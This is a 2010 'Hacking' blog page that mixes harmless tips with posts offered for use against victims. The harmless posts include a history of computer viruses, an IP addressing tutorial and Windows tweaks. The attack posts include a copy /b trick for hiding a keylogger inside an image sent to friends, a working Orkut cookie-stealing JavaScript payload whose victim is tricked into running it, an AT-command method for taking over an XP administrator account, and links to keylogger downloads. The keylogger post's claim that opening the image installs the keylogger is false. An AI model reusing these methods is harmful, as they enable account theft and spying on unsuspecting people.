Showing posts with label Hacking. Show all posts
Showing posts with label Hacking. Show all posts

Tuesday, March 16, 2010

Send Trojan or EXE Files Behind The Image

HACK FRIENDS PASSWORD BY SENDING KEYLOGGERS OR TROJANS BY SENDING THEM BEHIND AN IMAGE
U CAN DO IT BY INSIDE KEYLOGGER
BUT SUPER KEYLOGGER WILL BE BEST
1.This is THE method to hide your Keylogger
copy these files to C:\ drive and paste them into a folder and open the command prompt window
2. the most important step is type this command at command prompt.
copy /b sourceimagefile.jpg + filetobehidden.exe targetimage.jpg
Now the logger in the .jpeg format
3.Now the antivirus cant detect the file.
4.Just send the uploaded image to the victim as soon as he clicks the image file invisible keylogger will be installed.
He'll b enjoying with picture and you enjoy with his emails.
download inside keylogger from here:
http://www.inside-logger.com/key_logger/download.html
or here:
http://www.trojanfrance.com/index.php?dir=KeyLoggers/
ENJOYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYY

Orkut Cookie Stealer Method ( HaCk Orkut ID's )

Orkut cookie stealing script

Requirements:-

1]Firefox
2]Add and edit cookie addon:- https://addons.mozilla.org/firefox/addon/573

Instructions:

1]First of all make a fake account
2]You will need GID of your profile so use the following script
3]In order to get the GID,Go to your fake account homepage and paste this script in the address bar and hit enter You will see the gid in the box.

Code:

script:void(prompt('',document.body.innerHTML.match(/http:\/\/\w+.orkut.com\/images\/\w+\/\d+\/([0-9]+).jpg/gi).join('\n').toString().replace(/http:\/\/\w+.orkut.com\/images\/\w+\/\d+\/([0-9]+).jpg/gi,'$1')))

Now suppose your GID is 2541021 then your cookie stealing script will be like this

Code:
java script:orkut=replyForm;orkut.toUserId.value=2541021;orkut.scrapText.value=eval(String.fromCharCode(100,111,99,117,109,101,110,116,46,99,111,111,107,105,101));orkut.action=Scrapbook.aspx?Action.submit;orkut.submit();i=0;a=document.links;setInterval(i++;a[i %document.links.length].style.color=c[i%c.length],10);void(0);

Scrap this to victim and tell him/her to run it in the addressbar, as soon as he/she runs the script you will get a cookie info into your fake account.Now go to the fake account and copy the cookie from "ORKUTPREF=ID=.."onwards till end.

Now go to
Tools>>cookie editor>> See the orkut+state Id and click on edit

Paste the whole cookie you copied, in the content.Click on save and close it.Just refresh it.Now you will be in victims account.

Hack passwords in fire fox

Easy way to know the passwords in firefox
first install greasemonkey in ur firefox to download it go to
https://addons.mozilla.org/en-US/firefox/addon/748
next goto
below URL
http://sandy.karnati.googlepages.com/10343.user.js
download it..............
now at bottom right side of firefox browser u can see greasemonkey
Enable it first
nd then
select shows the password in mouse over
then goto any login page
type user name and password
then keep the mousepointer on the password which u had entered...............


U CAN SEE THE PASSWORD...............................

it is 100% working

njoy

Monday, February 15, 2010

Ethical Hacking tools

Here is a list of the most important tools:

1) IP Address Scanner
2) IP Calculator
3) IP Converter
4) Port Listener
5) Port Scanner
6) Ping
7) NetStat (2 ways)
8) Trace Route (2 ways)
9) TCP/IP Configuration
10) Online - Offline Checker
11) Resolve Host & IP
12) Time Sync
13) Whois & MX Lookup
14) Connect0r
15) Connection Analysator and protector
16) Net Sender
17) E-mail seeker
18) Net Pager
19) Active and Passive port scanner
20) Spoofer
21) Hack Trapper
22) HTTP flooder (DoS)
23) Mass Website Visiter
24) Advanced Port Scanner
25) Trojan Hunter (Multi IP)
26) Port Connecter Tool
27) Advanced Spoofer
28) Advanced Anonymous E-mailer
29) Simple Anonymous E-mailer
30) Anonymous E-mailer with Attachment Support
31) Mass E-mailer
32) E-mail Bomber
33) E-mail Spoofer
34) Simple Port Scanner (fast)
35) Advanced Netstat Monitoring
36) X Pinger
37) Web Page Scanner
38) Fast Port Scanner
39) Deep Port Scanner
40) Fastest Host Scanner (UDP)
41) Get Header
42) Open Port Scanner
43) Multi Port Scanner
44) HTTP scanner (Open port 80 subnet scanner)
45) Multi Ping for Cisco Routers
46) TCP Packet Sniffer
47) UDP flooder
48) Resolve and Ping
49) Multi IP ping
50) File Dependency Sniffer
51) EXE-joiner (bind 2 files)
52) Encrypter
53) Advanced Encryption
54) File Difference Engine
55) File Comparasion
56) Mass File Renamer
57) Add Bytes to EXE
58) Variable Encryption
59) Simple File Encryption
60) ASCII to Binary (and Binary to ASCII)
61) Enigma
62) Password Unmasker
63) Credit Card Number Validate and Generate
64) Create Local HTTP Server
65) eXtreme UDP Flooder
66) Web Server Scanner
67) Force Reboot
68) Webpage Info Seeker
69) Bouncer
70) Advanced Packet Sniffer
71) IRC server creater
72) Connection Tester
73) Fake Mail Sender
74) Bandwidth Monitor
75) Remote Desktop Protocol Scanner
76) MX Query
77) Messenger Packet Sniffer
78) API Spy
79) DHCP Restart
80) File Merger
81) E-mail Extractor (crawler / harvester bot)
82) Open FTP Scanner
83) Advanced System Locker
84) Advanced System Information
85) CPU Monitor
86) Windows Startup Manager
87) Process Checker
88) IP String Collecter
89) Mass Auto-Emailer (Database mailer; Spammer)
90) Central Server (Base Server; Echo Server; Time
Server; Telnet Server; HTTP Server; FTP Server)
91) Fishing Port Scanner (with named ports)
92) Mouse Record / Play Automation (Macro Tool)
93) Internet / LAN Messenger Chat (Server + Client)
94) Timer Shutdown/Restart/Log Off/Hibernate/Suspend/
Control
95) Hash MD5 Checker
96) Port Connect - Listen tool
97) Internet MAC Address Scanner (Multiple IP)
98) Connection Manager / Monitor
99) Direct Peer Connecter (Send/Receive files + chat)
100) Force Application Termination (against Viruses and
Spyware)
101) Easy and Fast Screenshot Maker (also Web Hex Color
Picker)
102) COM Detect and Test
103) Create Virtual Drives
104) URL Encoder
105) WEP/WPA Key Generator
106) Sniffer.NET
107) File Shredder
108) Local Access Enumerater
109) Steganographer (Art of hiding secret data in
pictures)
110) Subnet Calculater
111) Domain to IP (DNS)
112) Get SNMP Variables
113) Internet Explorer Password Revealer
114) Advanced Multi Port Scanner
115) Port Identification List (+port scanner)
116) Get Quick Net Info
117) Get Remote MAC Address
118) Share Add
119) Net Wanderer
120) WhoIs Console
121) Cookies Analyser
122) Hide Secret Data In Files
123) Packet Generator
124) Secure File Splitting
125) My File Protection (Password Protect Files, File
Injections)
126) Dynamic Switch Port Mapper
127) Internet Logger (Log URL)
128) Get Whois Servers
129) File Split&Merge
130) Hide Drive
131) Extract E-mails from Documents
132) Net Tools Mini (Client/Server, Scan, ICMP, Net
Statistics, Interactive, Raw Packets, DNS, Whois, ARP,
Computer's IP, Wake On LAN)
133) Hook Spy
134) Software Uninstaller
135) Tweak & Clean XP
136) Steganographic Random Byte Encryption
137) NetTools Notepad (encrypt your sensitive data)
138) File Encrypter/Decrypter
139) Quick Proxy Server
140) Connection Redirector (HTTP, IRC, ... All protocols
supported)
141) Local E-mail Extractor
142) Recursive E-mail Extractor
143) Outlook Express E-mail Extractor
144) Telnet Client
145) Fast Ip Catcher
146) Monitor Host IP
147) FreeMAC (MAC Address Editor)
148) QuickFTP Server (+user accounts support)
149) NetTools Macro Recorder/Player (Keybord and Mouse
Hook)
150) Network Protocol Analyzer
151) Steganographic Tools (Picture, Sounds, ZIP
Compression and Misc Methods)
152) WebMirror (Website Ripper)
153) Extra Tools (nmap console & win32 version)

Make you Xp Talk

Open a text file in notepad and write:

;copy from here--------------

Dim msg, sapi
msg=InputBox("Enter your text","Talk it")
Set sapi=CreateObject("sapi.spvoice")
sapi.Speak msg

;----------to here


( ';')< " Save the file with a (*.vbs) extension, it will create a VBScript File.
It will prompt you for a text, input the text and press ok."

Hack Test.

here is the link for 15 levels....
level 1
http://www.hack-test.com/
level 2
http://www.hack-test.com/null.htm
level 3
http://www.hack-test.com/l3l.htm
level 4
http://www.hack-test.com/abrae.htm
level 5
http://www.hack-test.com/sdrawkcab.htm
level 6
http://www.hack-test.com/save_as.htm
level 7
http://www.hack-test.com/included.htm
level 8
http://www.hack-test.com/phat.php
level 9
http://www.hack-test.com/phat.php
level 10
http://www.hack-test.com/gazebruh.php
level 11
http://www.hackertest.net/rofl.php
level 12
http://www.hack-test.com/clipart.php
level 13
http://www.hack-test.com/puta.php
level 14
http://www.hackertest.net/4xml.php
level 15
http://www.hack-test.com/totally.php

Admin Hack 99% working

Crack into admin acc from limited account(99.99% works)

Go to cmd

type AT (time) /interactive “cmd.exe”

enter time in 24hr format

means if you want to enter 5.00pm then enter 17:00

then a new window of cmd will open at specified time

In new window type net(space)user

press enter

after this u will see some names on ur screen

notedown the name of admin acc

then type

net user (name of admin acc u want to crack into) *
e.g if the name of admin acc is jayson then type

net user jayson *

then it will ask u for new password

enter password of ur choice

and u got the admin password

Bootable cd Format Xp.

Try changing ur BOOT DEVICE PRIORITY
make ur cd drive as 1st bootable device
then ur hard disk as 2nd.
restart
insert the xp cd(should b bootable)
w8 for a sec
a message will come
like
to continue booting with cd drive press any key
press any key n it will lead u to xp installation.

format the drive having the older Xp(windows)

if u want to format the other drives then after installing
windows in 1 drive foramt the oher drives
by right click on drive icon
n choose format
then quick format
...

Evolution Of Computer Viruses History Of Viruses.

part 1


Like any other field in computer science, viruses have evolved -a great deal indeed- over the years. In the series of press releases which start today, we will look at the origins and evolution of malicious code since it first appeared up to the present.

Going back to the origin of viruses, it was in 1949 that Mathematician John Von Neumann described self-replicating programs which could resemble computer viruses as they are known today. However, it was not until the 60s that we find the predecessor of current viruses. In that decade, a group of programmers developed a game called Core Wars, which could reproduce every time it was run, and even saturate the memory of other players’ computers. The creators of this peculiar game also created the first antivirus, an application named Reeper, which could destroy copies created by Core Wars.

However, it was only in 1983 that one of these programmers announced the existence of Core Wars, which was described the following year in a prestigious scientific magazine: this was actually the starting point of what we call computer viruses today.

At that time, a still young MS-DOS was starting to become the preeminent operating system worldwide. This was a system with great prospects, but still many deficiencies as well, which arose from software developments and the lack of many hardware elements known today. Even like this, this new operating system became the target of a virus in 1986: Brain, a malicious code created in Pakistan which infected boot sectors of disks so that their contents could not be accessed. That year also saw the birth of the first Trojan: an application called PC-Write.

Shortly after, virus writers realized that infecting files could be even more harmful to systems. In 1987, a virus called Suriv-02 appeared, which infected COM files and opened the door to the infamous viruses Jerusalem or Viernes 13. However, the worst was still to come: 1988 set the date when the “Morris worm” appeared, infecting 6,000 computers.

From that date up to 1995 the types of malicious codes that are known today started being developed: the first macro viruses appeared, polymorphic viruses … Some of these even triggered epidemics, such as MichaelAngelo. However, there was an event that changed the virus scenario worldwide: the massive use of the Internet and e-mail. Little by little, viruses started adapting to this new situation until the appearance, in 1999, of Melissa, the first malicious code to cause a worldwide epidemic, opening a new era for computer viruses.



part 2


This second installment of ‘The evolution of viruses’ will look at how malicious code used to spread before use of the Internet and e-mail became as commonplace as it is today, and the main objectives of the creators of those earlier viruses.
Until the worldwide web and e-mail were adopted as a standard means of communication the world over, the main mediums through which viruses spread were floppy disks, removable drives, CDs, etc., containing files that were already infected or with the virus code in an executable boot sector.

When a virus entered a system it could go memory resident, infecting other files as they were opened, or it could start to reproduce immediately, also infecting other files on the system. The virus code could also be triggered by a certain event, for example when the system clock reached a certain date or time. In this case, the virus creator would calculate the time necessary for the virus to spread and then set a date –often with some particular significance- for the virus to activate. In this way, the virus would have an incubation period during which it didn’t visibly affect computers, but just spread from one system to another waiting for ‘D-day’ to launch its payload. This incubation period would be vital to the virus successfully infecting as many computers as possible.

One classic example of a destructive virus that lay low before releasing its payload was CIH, also known as Chernobyl. The most damaging version of this malicious code activated on April 26, when it would try to overwrite the flash-BIOS, the memory which includes the code needed to control PC devices. This virus, which first appeared in June 1998, had a serious impact for over two years and still continues to infect computers today.

Because of the way in which they propagate, these viruses spread very slowly, especially in comparison to the speed of today’s malicious code. Towards the end of the Eighties, for example, the Friday 13th (or Jerusalem) virus needed a long time to actually spread and continued to infect computers for some years. In contrast, experts reckon that in January 2003, SQLSlammer took just ten minutes to cause global communication problems across the Internet.

Notoriety versus stealth

For the most part, in the past, the activation of a malicious code triggered a series of on screen messages or images, or caused sounds to be emitted to catch the user’s attention. Such was the case with the Ping Pong virus, which displayed a ball bouncing from one side of the screen to another. This kind of elaborate display was used by the creator of the virus to gain as much notoriety as possible. Nowadays however, the opposite is the norm, with virus authors trying to make malicious code as discreet as possible, infecting users’ systems without them noticing that anything is amiss.



pat 3


This third installment of ‘The evolution of viruses’ will look at how the Internet and e-mail changed the propagation techniques used by computer viruses.

Internet and e-mail revolutionized communications. However, as expected, virus creators didn’t take long to realize that along with this new means of communication, an excellent way of spreading their creations far and wide had also dawned. Therefore, they quickly changed their aim from infecting a few computers while drawing as much attention to themselves as possible, to damaging as many computers as possible, as quickly as possible. This change in strategy resulted in the first global virus epidemic, which was caused by the Melissa worm.

With the appearance of Melissa, the economic impact of a virus started to become an issue. As a result, users -above all companies- started to become seriously concerned about the consequences of viruses on the security of their computers. This is how users discovered antivirus programs, which started to be installed widely. However, this also brought about a new challenge for virus writers, how to slip past this protection and how to persuade users to run infected files.

The answer to which of these virus strategies was the most effective came in the form of a new worm: Love Letter, which used a simple but effective ruse that could be considered an early type of social engineering. This strategy involves inserting false messages that trick users into thinking that the message includes anything, except a virus. This worm’s bait was simple; it led users to believe that they had received a love letter.

This technique is still the most widely used. However, it is closely followed by another tactic that has been the center of attention lately: exploiting vulnerabilities in commonly used software. This strategy offers a range of possibilities depending on the security hole exploited. The first malicious code to use this method –and quite successfully- were the BubbleBoy and Kakworm worms. These worms exploited a vulnerability in Internet Explorer by inserting HTML code in the body of the e-mail message, which allowed them to run automatically, without needing the user to do a thing.

Vulnerabilities allow many different types of actions to be carried out. For example, they allow viruses to be dropped on computers directly from the Internet -such as the Blaster worm-. In fact, the effects of the virus depend on the vulnerability that the virus author tries to exploit.



part 4


In the early days of computers, there were relatively few PCs likely to contain “sensitive” information, such as credit card numbers or other financial data, and these were generally limited to large companies that had already incorporated computers into working processes.

In any event, information stored in computers was not likely to be compromised, unless the computer was connected to a network through which the information could be transmitted. Of course, there were exceptions to this and there were cases in which hackers perpetrated frauds using data stored in IT systems. However, this was achieved through typical hacking activities, with no viruses involved.

The advent of the Internet however caused virus creators to change their objectives, and, from that moment on, they tried to infect as many computers as possible in the shortest time. Also, the introduction of Internet services -like e-banking or online shopping- brought in another change. Some virus creators started writing malicious codes not to infect computers, but, to steal confidential data associated to those services. Evidently, to achieve this, they needed viruses that could infect many computers silently.

Their malicious labor was finally rewarded with the appearance, in 1986, of a new breed of malicious code generically called “Trojan Horse”, or simply “Trojan”. This first Trojan was called PC-Write and tried to pass itself off as the shareware version of a text processor. When run, the Trojan displayed a functional text processor on screen. The problem was that, while the user wrote, PC-Write deleted and corrupted files on the computers’ hard disk.

After PC-Write, this type of malicious code evolved very quickly to reach the stage of present-day Trojans. Today, many of the people who design Trojans to steal data cannot be considered virus writers but simply thieves who, instead of using blowtorches or dynamite have turned to viruses to commit their crimes. Ldpinch.W or the Bancos or Tolger families of Trojans are examples of this


part 5


Even though none of them can be left aside, some particular fields of computer science have played a more determinant role than others with regard to the evolution of viruses. One of the most influential fields has been the development of programming languages.

These languages are basically a means of communication with computers in order to tell them what to do. Even though each of them has its own specific development and formulation rules, computers in fact understand only one language called "machine code".

Programming languages act as an interpreter between the programmer and the computer. Obviously, the more directly you can communicate with the computer, the better it will understand you, and more complex actions you can ask it to perform.

According to this, programming languages can be divided into "low and high level" languages, depending on whether their syntax is more understandable for programmers or for computers. A "high level" language uses expressions that are easily understandable for most programmers, but not so much for computers. Visual Basic and C are good examples of this type of language.

On the contrary, expressions used by "low level" languages are closer to machine code, but are very difficult to understand for someone who has not been involved in the programming process. One of the most powerful, most widely used examples of this type of language is "assembler".

In order to explain the use of programming languages through virus history, it is necessary to refer to hardware evolution. It is not difficult to understand that an old 8-bit processor does not have the power of modern 64-bit processors, and this of course, has had an impact on the programming languages used.

In this and the next installments of this series, we will look at the different programming languages used by virus creators through computer history:

- Virus antecessors: Core Wars

As was already explained in the first chapter of this series, a group of programs called Core Wars, developed by engineers at an important telecommunications company, are considered the antecessors of current-day viruses. Computer science was still in the early stages and programming languages had hardly developed. For this reason, authors of these proto-viruses used a language that was almost equal to machine code to program them.

Curiously enough, it seems that one of the Core Wars programmers was Robert Thomas Morris, whose son programmed -years later- the "Morris worm". This malicious code became extraordinarily famous since it managed to infect 6,000 computers, an impressive figure for 1988.

- The new gurus of the 8-bits and the assembler language.

The names Altair, IMSAI and Apple in USA and Sinclair, Atari and Commodore in Europe, bring memories of times gone by, when a new generation of computer enthusiasts "fought" to establish their place in the programming world. To be the best, programmers needed to have profound knowledge of machine code and assembler, as interpreters of high-level languages used too much run time. BASIC, for example, was a relatively easy to learn language which allowed users to develop programs simply and quickly. It had however, many limitations.

This caused the appearance of two groups of programmers: those who used assembler and those who turned to high-level languages (BASIC and PASCAL, mainly).

Computer aficionados of the time enjoyed themselves more by programming useful software than malware. However, 1981 saw the birth of what can be considered the first 8-bit virus. Its name was "Elk Cloner", and was programmed in machine code. This virus could infect Apple II systems and displayed a message when it infected a computer.



part 6


Computer viruses evolve in much the same way as in other areas of IT. Two of the most important factors in understanding how viruses have reached their current level are the development of programming languages and the appearance of increasingly powerful hardware.

In 1981, almost at the same time as Elk Kloner (the first virus for 8-bit processors) made its appearance, a new operating system was growing in popularity. Its full name was Microsoft Disk Operating System, although computer buffs throughout the world would soon refer to it simply as DOS.

DOS viruses

The development of MS DOS systems occurred in parallel to the appearance of new, more powerful hardware. Personal computers were gradually establishing themselves as tools that people could use in their everyday lives, and the result was that the number of PCs users grew substantially. Perhaps inevitably, more users also started creating viruses. Gradually, we witnessed the appearance of the first viruses and Trojans for DOS, written in assembler language and demonstrating a degree of skill on the part of their authors.

Far less programmers know assembler language than are familiar with high-level languages that are far easier to learn. Malicious code written in Fortran, Basic, Cobol, C or Pascal soon began to appear. The last two languages, which are well established and very powerful, are the most widely used, particularly in their TurboC and Turbo Pascal versions. This ultimately led to the appearance of “virus families”: that is, viruses that are followed by a vast number of related viruses which are slightly modified forms of the original code.

Other users took the less ‘artistic’ approach of creating destructive viruses that did not require any great knowledge of programming. As a result, batch processing file viruses or BAT viruses began to appear.

Win16 viruses

The development of 16-bit processors led to a new era in computing. The first consequence was the birth of Windows, which, at the time, was just an application to make it easier to handle DOS using a graphic interface.

The structure of Windows 3.xx files is rather difficult to understand, and the assembler language code is very complicated, as a result of which few programmers initially attempted to develop viruses for this platform. But this problem was soon solved thanks to the development of programming tools for high-level languages, above all Visual Basic. This application is so effective that many virus creators adopted it as their ‘daily working tool’. This meant that writing a virus had become a very straightforward task, and viruses soon appeared in their hundreds. This development was accompanied by the appearance of the first Trojans able to steal passwords. As a result, more than 500 variants of the AOL Trojan family -designed to steal personal information from infected computers- were identified.

part 7

This seventh edition on the history of computer viruses will look at how the development of Windows and Visual Basic has influenced the evolution of viruses, as with the development of these, worldwide epidemics also evolved such as the first one caused by Melissa in 1999.

While Windows changed from being an application designed to make DOS easier to manage to a 32-bit platform and operating system in its own right, virus creators went back to using assembler as the main language for programming viruses.

Versions 5 and 6 of Visual Basic (VB) were developed, making it the preferred tool, along with Borland Delphi (the Pascal development for the Windows environment), for Trojan and worm writers. Then, Visual C, a powerful environment developed in C for Windows, was adopted for creating viruses, Trojans and worms. This last type of malware gained unusual strength, taking over almost all other types of viruses. Even though the characteristics of worms have changed over time, they all have the same objective: to spread to as many computers as possible, as quickly as possible.

With time, Visual Basic became extremely popular and Microsoft implemented part of the functionality of this language as an interpreter capable of running script files with a similar syntax.

At the same time as the Win32 platform was implemented, the first script viruses also appeared: malware inside a simple text file. These demonstrated that not only executable files (.EXE and .COM files) could carry viruses. As already seen with BAT viruses, there are also other means of propagation, proving the saying "anything that can be executed directly or through a interpreter can contain malware." To be specific, the first viruses that infected the macros included in Microsoft Office emerged. As a result, Word, Excel, Access and PowerPoint become ways of spreading ‘lethal weapons’, which destroyed information when the user simply opened a document.

Melissa and self-executing worms

The powerful script interpreters in Microsoft Office allowed virus authors to arm their creations with the characteristics of worms. A clear example is Melissa, a Word macro virus with the characteristics of a worm that infects Word 97 and 2000 documents. This worm automatically sends itself out as an attachment to an e-mail message to the first 50 contacts in the Outlook address book on the affected computer. This technique, which has unfortunately become very popular nowadays, was first used in this virus which, in 1999, caused one of the largest epidemics in computer history in just a few days. In fact, companies like Microsoft, Intel or Lucent Technologies had to block their connections to the Internet due to the actions of Melissa.

The technique started by Melissa was developed in 1999 by viruses like VBS/Freelink, which unlike its predecessor sent itself out to all the contacts in the address book on the infected PC. This started a new wave of worms capable of sending themselves out to all the contacts in the Outlook address book on the infected computer. Of these, the worm that most stands out from the rest is VBS/LoveLetter, more commonly known as ‘I love You’, which emerged in May 2000 and caused an epidemic that caused damage estimated at 10,000 million euros. In order to get the user’s attention and help it to spread, this worm sent itself out in an e-mail message with the subject ‘ILOVEYOU’ and an attached file called ‘LOVE-LETTER-FOR-YOU.TXT.VBS’. When the user opened this attachment, the computer was infected.

As well as Melissa, in 1999 another type of virus emerged that also marked a milestone in virus history. In November of that year, VBS/BubbleBoy appeared, a new type of Internet worm written in VB Script. VBS/BubbleBoy was automatically run without the user needing to click on an attached file, as it exploited a vulnerability in Internet Explorer 5 to automatically run when the message was opened or viewed. This worm was followed in 2000 by JS/Kak.Worm, which spread by hiding behind Java Script in the auto-signature in Microsoft Outlook Express, allowing it to infect computers without the user needing to run an attached file. These were the first samples of a series of worms, which were joined later on by worms capable of attacking computers when the user is browsing the Internet.

IP Address Structure.

Note: the terms multicast address and MSB are explained at the end.



Every station on a PSN (packet switched network) that is based on the TCP/IP
protocol (your computer is one, for example. Yes, we're referring to a host
that is connected to the net) must have an IP address, so it can be identified,
and information can be relayed and routed to it in an orderly fashion.



An IP address consists of a 32 bit logical address. The address is divided
into two fields:



1) The network address:


Assigned by InterNIC (Internet Network Information Center).
In fact most ISPs (internet service providers) purchase a number of addresses
and assign them individually.



2) The host address:


An address that identifies the single nodes throughout the network. It can be assigned
by the network manager, by using protocols for it such as DHCP, or the workstation itself.



[The IP networking protocol is a logically routed protocol, meaning that address 192.43.54.2
will be on the same physical wire as address 192.43.54.3 (of course this is not always true. It depends on the

subnet mask of the network, but all of that can fill a text of its own)


IP address structure:


---.---.---.---

^ ^
| |
network | host

Every " --- " = 8 bits.
The first bits ===> network address
The last bits ===> host address.
with 8 bits you can present from 0-255 . (binary=(2 to the power of 8)-1)

Example:
11000010.01011010.00011111.01001010 (binary)
194.90.31.74 (decimal)
IP address CLASSES :
We can classify IP addreses to 5 groups. You can distinguish them by comparing the "High Order" bits (the first four bits on the
left of the address):

type | model | target | MSB |addr.range |bit number| max.stations|
| | groups | | |net./hosts| |
------|--------|--------|-----|--------------|----------|-------------|
A |N.h.h.h | ALL | 0 | 1.0.0.0 | 24/7 | 16,777,214 |
| | ACCEPT | | to | | |
| | HUGE | | 127.0.0.0 | | |
| | CORPS | | | | |
-----------------------------------------------------------------------
|N.N.h.h | TO ALL | 10 | 128.1.00 | 16/14 | 65,543 |
B | | LARGE | | to | | |
| | CORPS | | 191.254.00 | | |
-----------------------------------------------------------------------
|N.N.N.h |TO ALOT | 110 | 192.0.1.0 | 8/22 | 254 |
C | |OF | | to | | |
| |SMALL | | 223.225.254 | | |
| |CORPS | | | | |
-----------------------------------------------------------------------
D | NONE |MULTI-CA|1110 | 224.0.0.0 | NOT FOR | UNKNOWN |
| |ST ADDR.| | to | USUAL | |
| |RFC-1112| |239.255.255.255| USE | |
-----------------------------------------------------------------------
E | NOT FOR|EXPERIME|1,1,1,1| 240.0.0.0 |NOT FOR| NOT FOR USE|
| USE |NTAL | | to |USE | |
| |ADDR. | |254.255.255.255| | |
-----------------------------------------------------------------------

N=NETWORK , h=HOST .



Notice the address range 127.X.X.X.
These addresses are assigned to internal use to the network device, and are
used as an application tool only. For example: 127.0.0.1, the most common one,
is called the loopback address - everything sent here goes directly back to
you, without even traveling out on the wire.
Also, some IPs are reserved for VPNs - Virtual Private Networks. These are
local area networks over wide area networks that use the Internet Protocol to
communicate, and each computer inside the network is assigned with an IP
address. So, suppose a certain computer wants to send a data packet to
another host on the network with the IP 'x', but there's also another host on
the Internet that has the same IP - what happens now? So this is why you
cannot use these and other forms of reserved IPs on the Internet.

EXTRA:

Distinguishing different groups:

You have to compare the first byte on the left in the address as follows:




Type | First byte | MSB
| in decimal |
----------------------------
A | 1-127 | 0
----------------------------
B | 128-191 | 10
----------------------------
C | 192-223 | 110
----------------------------
D | 224-239 | 1110
----------------------------
E | 240-254 | 1111
----------------------------


NOTES: Yes, we know, we've left A LOT of things unexplained in this text.
With time, we will write more tutorials to cover these and other subjects. So
in the meantime, I suggest that you go to http://blacksun.box.sk, find the
tutorials page and see if there's anything else that's interesting to you.
And remember - we also have a message board, so if you have any questions,
feel free to post them there.


weird shit (newbie note):

1) Multicast: (copied from RFC 1112)
IP multicasting is the transmission of an IP datagram to a "host
group", a set of zero or more hosts identified by a single IP
destination address. A multicast datagram is delivered to all
members of its destination host group with the same "best-efforts"
reliability as regular unicast IP datagrams, i.e., the datagram is
not guaranteed to arrive intact at all members of the destination
group or in the same order relative to other datagrams.

The membership of a host group is dynamic; that is, hosts may join
and leave groups at any time. There is no restriction on the
location or number of members in a host group. A host may be a
member of more than one group at a time. A host need not be a member
of a group to send datagrams to it.

A host group may be permanent or transient. A permanent group has a
well-known, administratively assigned IP address. It is the address,
not the membership of the group, that is permanent; at any time a
permanent group may have any number of members, even zero. Those IP
multicast addresses that are not reserved for permanent groups are
available for dynamic assignment to transient groups which exist only
as long as they have members.

Internetwork forwarding of IP multicast datagrams(ip packets)is handled by
"multicast routers" which may be co-resident with, or separate from,
internet gateways. A host transmits an IP multicast datagram as a
local network multicast which reaches all immediately-neighboring
members of the destination host group. If the datagram has an IP
time-to-live greater than 1, the multicast router(s) attached to the
local network take responsibility for forwarding it towards all other
networks that have members of the destination group. On those other
member networks that are reachable within the IP time-to-live, an
attached multicast router completes delivery by transmitting the
datagram(ip packet) as a local multicast.

*if you donot understand the above do not worry, it is complicated and dry
but reread it and read it again get a dictionary if it helps.
Hacking is not easy.

2) MSB: Most Significent Bit:
In set numbers the first number on the left is the most important because it
holds the highest value as opposed to the LSB=> least significent bit, it
always holds the the smallest value.

Editing The Boot.ini File

Boot.ini file is an initialization file, but editing it for some people has been a bad experience. In this post i will let you know the codes and their meaning and also how to edit them easily. By default this is hidden in Xp, but in case of win 98, it can be searched.
To access the file in Xp :-

• Right click on My Computer and select Properties.
• Go to the Advanced tab and click Settings in Startup and Recovery section.
• Click Edit and you will see the Boot.ini file opened in a notepad.


Now File says something like this

[boot loader]
timeout=30
default=multi(0)disk(0)rdisk(0)partition(1)\WINDOWS
[operating systems]
multi(0)disk(0)rdisk(0)partition(1)\WINDOWS=”Microsoft Windows XP Professional” /fastdetect

The First line [Boot loader] just states the Booting Process.
timeout=30 is the time that will be provided to you to select from the list of OS’s installed. This works only in case you have multiple OS’s installed. It can be reduced easily, but make sure you give enough time to react upon it. 10 Seconds is the appropriate time.
The third line says multi(0)disk(0)rdisk(0)partition(1)\WINDOWS=”Microsoft Windows XP Professional” /fastdetect. multi(0) tells us the IDE on which the drive is attached to. Usually its Primary only. disk(0) shows the number of Hard disks mounted. rdisk(0) tells us from which disk it is booting. In case of SCSI drives, it might not show up. partition(1) tell that on which Logical partition the OS is installed on.
After that it says “Microsoft Windows XP Professional” that is the name that shows up on the OS selection page. You can put your own name there as well.
This was the editable part of Boot.ini file.
Now in case if you delete the file accidentally then you need not worry, you don’t need to create the file again. Xp will create a file of its own, and your system is safe.
But in case if someone edits it and puts in the wrong information, then it you system will find the file but not the correct path. So that might harm your Computer.

Monday, January 25, 2010

Unlimited Rapidshare Downloads.

Its very easy to fool Rapid Share server if your IP address is assigned by your ISP. Just follow these simple steps:

clean up IE or netscape cookie( In this case the one that belong to rapidshare website)
On Command prompt
type -----> ipconfig /flushdns <---Enter
type -----> ipconfig /release <---Enter
type -----> ipconfig /renew <---Enter
type -----> exit <--------Enter

Or save these commands in a bat file and run it everytime you need to fool Rapidshare server.Remember to clean up rapidshare cookie in your temp Internet files folder.

Now you should be ready to download as many files as you want from their server.

And there is this cool link: paste it in the browser and see
CODE
http://www.google.com/search?lr=&as_qdr=all&q=+.rar+OR+.zip+OR+.pdf+OR+.exe+site%3Arapidshare.de

Put a background wallpaper on ur USB drive.

All my friends love this, and they keep asking how i do it, so here...
Copy this code to notepad,then save it as "desktop.ini"



[.ShellClassInfo]
IconFile=%SystemRoot%\system32\SHELL32.dll
IconIndex=127
ConfirmFileOp=0


[{BE098140-A513-11D0-A3A4-00C04FD706EC}]
Attributes=1
IconArea_Image="your_picture.jpg"
IconArea_Text="0xFFFFFF"
VeBRA sources - don't delete the tag above, it's there for XXXXX purposes -
[ExtShellFolderViews]
{BE098140-A513-11D0-A3A4-00C04FD706EC}={BE098140-A513-11D0-A3A4-00C04FD706EC}
{5984FFE0-28D4-11CF-AE66-08002B2E1262}={5984FFE0-28D4-11CF-AE66-08002B2E1262}

[{5984FFE0-28D4-11CF-AE66-08002B2E1262}]
PersistMoniker=Folder.htt
PersistMonikerPreview=%WebDir%\folder.bmp



1. Where "your_picture.jpg" is, delete that and replace with your picture name for example "superman.gif"

2. Put "desktop.ini and your chosen picture in ur USB Drive then Hidden it

3. Refresh and ENJOY with your new background.

4.u can also try on C,D,E F drives.

Delete An "undeletable" File.


Open a Command Prompt window and leave it open.
Close all open programs.
Click Start, Run and enter TASKMGR.EXE
Go to the Processes tab and End Process on Explorer.exe.
Leave Task Manager open.
Go back to the Command Prompt window and change to the directory the AVI (or other undeletable file) is located in.
At the command prompt type DEL where is the file you wish to delete.
Go back to Task Manager, click File, New Task and enter EXPLORER.EXE to restart the GUI shell.
Close Task Manager.


Or you can try this

Open Notepad.exe

Click File>Save As..>

locate the folder where ur undeletable file is

Choose 'All files' from the file type box

click once on the file u wanna delete so its name appears in the 'filename' box

put a " at the start and end of the filename
